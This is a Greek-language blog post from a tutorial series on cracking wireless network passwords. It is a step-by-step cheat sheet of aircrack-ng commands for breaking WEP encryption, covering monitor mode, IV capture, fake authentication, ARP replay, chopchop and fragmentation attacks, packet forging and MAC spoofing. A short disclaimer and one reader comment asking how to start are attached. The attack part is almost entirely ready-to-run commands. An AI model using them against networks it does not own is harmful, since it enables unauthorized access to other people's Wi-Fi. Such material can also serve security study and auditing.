Σπάσιμο Κωδικών Ασύρματων Δικτύων – 5 — Cracking WEP – Μέρος 3ο – Όλες οι εντολές


Σημείωση : Οι πληροφορίες που ακολουθούν στο συγκεκριμμένο άρθρο έχουν χαρακτήρα καθαρά ενημερωτικό. O γράφων δεν φέρει καμία ευθύνη για την χρησιμοποιήση των παρακάτω καθ’ οιονδήποτε μη σύννομο τρόπο.

ΒΑΣΙΚΑ ΒΗΜΑΤΑ

1) Ενεργοποίηση της λειτουργίας Monitor Mode στην ασύρματη κάρτα

airmon-ng stop ath0
airmon-ng start wifi0

2) Συλλογή IVs και Sniffing
airodump-ng
-c CHANNEL
--bssid BSSID
-w FILE
ath0

3) Fake authentication
aireplay-ng
-1 0
-q PACKETSETS_PS [1]
-e ESSID
-a BSSID
-h MAC
ath0

4) ARP request Replay Mode
aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0

5) Ξεκλείδωμα WEP
aircrack-ng
- z (activate PTW vs FMS/KoreK attack)
-b BSSID
FILE

INJECTION

– Έλεγχος αν η κάρτα έχει δυνατότητες packet injection

aireplay-ng -9 ath0 (wifi0/wlan0)

1) ARP request Replay Mode
aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0

2) Previous ARP request Replay Mode
aireplay-ng
-3
-b BSSID
-h MAC
-r CAP_FILE
-x PACKETS_SEND_PS [900]
ath0

3) Interactive packet replay
a) Natural ###### ###### (χωρίς fake ID)
aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
ath0

β) Modified ###### ###### (χωρίς fake ID)
aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
-p 0841
ath0

CHOPCHOP/FRAGMENTATION

1) Fragmentation

aireplay-ng
-5
-b BSSID
-h MAC
ath0

2) ChopChop
aireplay-ng
-4
-b BSSID
-h MAC
ath0

– Packet forging
packetforge-ng
-0
-a BSSID
-h MAC
-k 255.255.255.255
-l 255.255.255.255
-y FRAGMENT_XOR_FILE
-w ARP_REQUEST (FILE TO WRITE TO)

– Forged ARP packet injection
aireplay-ng
-2
-r ARP_REQUEST
ath0

MAC SPOOFING

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up



<< Προηγούμενο Μάθημα
Cracking WEP – Μέρος 2ο
Επόμενο Μάθημα >>
Cracking WPA / WPA2 – Μέρος 1ο




Ετικέττες

-

Σού άρεσε? Πρότεινέ το σ' έναν φίλο!

Συναφή Άρθρα

1 Σχόλιο

  1. pws to kanw auto????????? “Ενεργοποίηση της λειτουργίας Monitor Mode στην ασύρματη κάρτα”

    despoina | 31/5/2011 | Απάντησε σε αυτό το σχόλιο

2 Trackback(s)

  1. Dec 23, 2009: from Σπάσιμο Κωδικών Ασύρματων Δικτύων | Η φωλιά του Χαμαιλέοντα
  2. Sep 26, 2010: from Σπάσιμο Κωδικών Ασύρματων Δικτύων – 6 — Cracking WPA / WPA2 – Μέρος 1ο – Thomson/Speedtouch routers | Η φωλιά του Χαμαιλέοντα

Κάνε ένα σχόλιο τώρα (όσο προλαβαίνεις...)